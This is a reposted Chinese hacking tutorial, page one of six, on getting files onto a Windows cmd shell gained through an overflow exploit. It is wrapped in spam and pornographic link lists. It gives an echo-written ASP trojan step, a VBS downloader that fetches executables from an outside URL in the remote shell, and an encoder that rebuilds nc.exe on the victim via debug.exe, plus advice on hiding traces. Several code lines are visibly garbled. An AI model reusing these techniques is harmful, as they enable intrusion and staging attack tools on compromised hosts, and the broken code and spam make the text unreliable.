国产激情自拍_国产9色视频_丁香花在线电影小说观看 _久久久久国产精品嫩草影院

首頁 > 編程 > BAT > 正文

Do All in Cmd Shell一切在命令行下完成第1/6頁

2020-07-26 20:28:50
字體:
來源:轉載
供稿:網友
文件傳輸
對于溢出漏洞獲得的cmd shell,最大的問題就是如何上傳文件。由于蠕蟲病毒流行,連接ipc$所需要的139或445端口被路由封鎖。再加上WinXP系統加強了對ipc$的保護,通過ipc$及默認共享上傳文件的手段基本無效了。ftp和tftp是兩種可行的方法,介于其已被大家熟知,本文就不介紹了。還有三種大家熟悉的辦法,作為總結我再提一下:

1,用Echo命令寫ASP木馬。
前提當然是目標主機上已經安裝了IIS。
一般的ASP木馬"體積"較大,不適合直接用echo命令寫入文件,這里我提供一個小巧的。
直接給出echo版:

@echo ^ >up.asp

注意,只有一行,中間沒有回車符。
生成的up.asp不能用瀏覽器訪問,只能用下面這個腳本:

with wscript
if .arguments.count>dl.vbs
@echo w.open "get",.arguments(0),0:w.send:if w.status^>200 then .echo "Error:"+w.status:.quit>>dl.vbs
@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs

舉例――下載ps.exe并保存到c:/path下:

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:/path/ps.exe

注意,這是在遠程shell中執行的。

4,Echo經過編碼的任何文件,再用腳本+debug還原。
前面兩個辦法都不能保證穿過防火墻。而且,除非自己架Web服務器,一般的Web資源都是以壓縮文件的形式提供。如果目標主機沒有解壓工具,還是沒轍。那么只有出"殺手锏"了!

echo命令加重定向x作符可以寫入ASCII碼小于128的字符,但大于等于128的不行。只有將本地文件重新"編碼"為可顯示的字符,才能方便地寫入遠程主機。首先能想到的就是base64編碼,即email附件的編碼方式。但vbs不支持位x作,因此編碼和解碼較復雜。更麻煩的是,腳本以二進制流方式處理文件的能力很差。(ADODB.Stream可以以流方式寫文件,但我無法構造出相應的數據類型。二進制數據流可以用midb函數轉成字符串,但反過來不行。我花了兩天時間,還是沒能解決這個問題。如果有誰能用vbs或js寫任意的字節數據到文件中,懇請賜教。)

無奈只有請debug.exe出馬了。原理很多人都知道,我不介紹了,直接給出成果――編碼腳本:

fp=wscript.arguments(0)
fn=right(fp,len(fp)-instrrev(fp,"/"))
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl/65536
with createobject("scripting.filesystemobject").opentextfile(fp&".bat",2,true)
.write "@echo str="""
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt>debug.vbs"+vbcrlf+"@echo +"""
next
.writeline """>>debug.vbs"+vbcrlf+"@echo with wscript.stdout:r=vbcrlf"_
+":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)"_
+":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
.writeline "@echo .write ""rbx""+r+"""+hex(slh)+"""+r+""rcx""+r+"""+hex(sll)_
+"""+r+""n debug.tmp""+r+""w""+r+""q""+r:end with"_
+">>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp """&fn&"""&del debug.vbs"
end with

將其保存為echo.vbs。假設要上傳nc.exe,那么在本地命令行輸入命令:

cscript echo.vbs nc.exe

也可以直接把要傳輸的文件的圖標拖放到腳本文件的圖標上。
稍等一會兒,在當前目錄下將生成一個nc.exe.bat。用記事本等編輯工具打開它,可以看到如下內容:

@echo str="4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000"_>>debug.vbs
@echo +"504500004C010400B98EAE340000000000000000E0000F010B010500009800000062000000000000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000"_>>debug.vbs
@echo +"002001003C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000"_>>debug.vbs
@echo +"70970000001000000098000000040000000000000000000000000000200000602E726461746100001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100"_>>debug.vbs
…………
…………(省略若干行)
…………
@echo +"">>debug.vbs
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "e"+hex(256+(i-1)/2):for j=i to i+46 step 2:.write " "+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx"+r+"0"+r+"rcx"+r+"E800"+r+"n debug.tmp"+r+"w"+r+"q"+r:end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp "NC.EXE"&del debug.vbs

全選 -》 復制 -》 切換到遠程命令行窗口 -》 粘貼。
如果網速不是很慢的話,整個上傳過程大約需要20秒。

幾點說明:
1,大的文件傳輸不穩定,可能會使shell死掉。所以文件越小效果越好。建議原文件不要超過100KB。
2,在傳輸大文件前,可以先傳個小的文件作為"熱身",讓16位虛擬機ntvdm.exe駐留后臺。所有文件傳完后,為隱蔽起見,應該把ntvdm進程殺掉。
3,某些cmd shell每個命令都需要附加兩個回車,那nc.exe.bat就不能直接用了。
4,單個命令的長度是有限的,所以不能只用一個echo完成全部任務。而且,對于nc提供的cmd shell,稍長一些的命令竟然會使shell自動退出(溢出了?)。你可以修改"i mod 128=0"語句中的128以調整每個echo命令的長度。每次echo的字符為這個數乘以2。
5,解碼過程沒有腳本參與也是可以的。使用腳本的目的是減少傳輸的數據量(因為壓縮了數據)。如果有時間,我會寫一個更完善的腳本,加強數據壓縮能力,增加數據校驗功能。

能上傳文件當然一切都好辦了,但很多x作用Windows自帶的工具更方便。在你到處尋找需要的工具時,不要忘了Windows本身。
123456下一頁閱讀全文
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
国产激情自拍_国产9色视频_丁香花在线电影小说观看 _久久久久国产精品嫩草影院
国产亚洲精品久久久久久移动网络| 日本欧洲一区| 在线观看中文| 日本高清中文字幕在线| 免费一区二区三区视频狠狠| 久久亚洲资源| 91久久麻豆| 丁香花在线电影小说观看| 国产视频三区| 超碰国产在线| 精品视频麻豆入口| 另类综合图区| 在线中文字幕第一页| 久久精品无码一区二区日韩av| 1区不卡电影| xxx国产精品| 国产午夜在线观看| 亚洲精品自产拍在线观看| 黄色国产网站在线播放| 18激情网站| 五月综合网站| 毛片视频免费观看| 国产va在线| 91caoporn在线| 免费电影网站在线视频观看福利| 国产不卡精品一区二区三区| 91xxx在线观看| 免费精品国产自产拍在| 亚洲国产精品区| 在线三级中文| 中文国产字幕在线观看| 中文字幕视频在线| 福利在线国产| 久久这里精品| 福利视频在线导航| 免费观看一二区视频网站| 色吊丝av中文字幕| 亚洲成人av高清| 性欧美精品xxxx| 亚洲私人影吧| 亚洲视频在线观看不卡| 在线黄色.com| 午夜在线网站| 欧美日韩视频精品二区| 日本电影在线观看| 麻豆网站在线| 黄色片av在线| 国产偷窥老熟盗摄视频| 国产精品理人伦一区二区三区| 国产一二三区在线| 国产二区在线播放| 99久久99久久免费精品小说| 永久免费av网站| 尤物在线视频观看| 日本h片在线观看| 九色视频网站| 国产成人亚洲欧美电影| 在线三级中文| 看成年女人免费午夜视频| 国产乱码在线| 国产99在线|亚洲| 在线视频1区2区| 丁香在线视频| 国产福利在线观看| 黄网在线免费| 在线国产福利网站| 国产卡1卡2卡三卡在线| 一区二区三区四区在线免费视频| 青青草在线播放| 国产羞羞视频| 亚洲成人av在线影院| 国产九色porn网址| 天天干天天操天天爽| 中文字幕在线视频不卡| 午夜在线视频| 国产精品9区| 欧美96在线| 国产三级自拍| jlzzjlzz欧美大全| 国产精品美女一区二区三区四区| 99久热re在线精彩视频| 中文字幕在线播放网址| 人人干人人插| av在线不卡网站| 91啦中文在线| 日本中文字幕视频| 欧美xxxx黑人又粗又长| 在线黄色.com| 91中文字幕| 国产福利视频在线观看| 国产视频二区| 九九视频精品在线| 超碰在线人人| 免费网站看黄yyy222| free性亚洲| 亚洲欧美精选| 亚洲免费网站在线观看| 在线中文av| 中文视频在线| av在线天天| wwwww在线观看免费视频| 日本久久国产| 狠狠综合久久久综合| аⅴ成人天堂中文在线| 日p在线观看| 青青草原国产在线观看| 亚洲一区二区三区在线观看网站| 国产黄色片大全| 精品欧美不卡一区二区在线观看| 国产精品欧美韩国日本久久| 国产精品乱码一区二区三区视频 | 激情亚洲综合网| 欧美另类在线视频| 九九视频精品在线| 最近免费中文字幕在线第一页| 最新国产在线精品91尤物| 国产午夜在线| 亚洲第一页在线播放| 亚洲精品自拍区在线观看| www.久草.com| 综合激情丁香| 99re热在线观看| 成年黄网站在线观看免费| 国产三级视频在线看| 在线国产中文字幕| 国产美女性感在线观看懂色av| 中文字幕久热在线精品| 亚洲欧美日韩一区成人| 国产一区在线视频观看| 精品一区二区三区在线成人| 四虎a级欧美在线观看| 中文字幕在线视频网| 亚洲午夜久久久久中文字幕| 国产在线一二三区| 精品推荐国产麻豆剧传媒| 精品资源在线看| 99热国产在线| 国产一区二区影视| 日本国产在线| 91在线网址| 中文字幕有码在线视频| 欧美大交乱xxxx| 91中文字幕网| 国产小视频在线观看| 麻豆av在线| gogogogo高清视频在线| av日韩在线免费| 在线中文资源天堂| 国产性网软件大全| 尤物视频免费在线观看| 九九99精品| sese一区| 不卡av免费观看| jizz国产| 蜜桃av在线免费观看| 在线看黄网站| 在线免费观看黄色片| 在线免费看黄av| av网站在线播放| av影视在线看| www.操.com| 超碰国产在线| 国产精品一品| 尤物视频在线免费观看| 国产精品自拍在线观看| 国产剧情av在线| 中中文字幕av在线| 国产深夜视频在线观看| 国产女主播在线观看| 国产一级免费看| 国产三级免费观看| 国产日韩精品在线看| 国产精品冒白浆免费视频| 2018狠狠干| av男人的天堂网| 牛牛热在线视频| 中文字幕国产视频| 91中文字幕网| www.色五月| 国产麻豆麻豆| 精品一二三四| 激情丁香久久| 国产对白国语对白| 青青青青在线| 国产精品视频二区三区| 先锋影音av中文字幕| 欧美精品日韩少妇| 国产色视频网站| 欧美日韩一区二区三区视视频| 天天操天天操一操| 天堂在线国产| 国产黄色免费看| 国产在线资源| 亚洲国产精品区| 中文字幕在线免费视频| 亚洲成人av在线影院| 国产精品yjizz视频网一二区| 牛牛精品视频在线| 在线播放www| 国产精品666|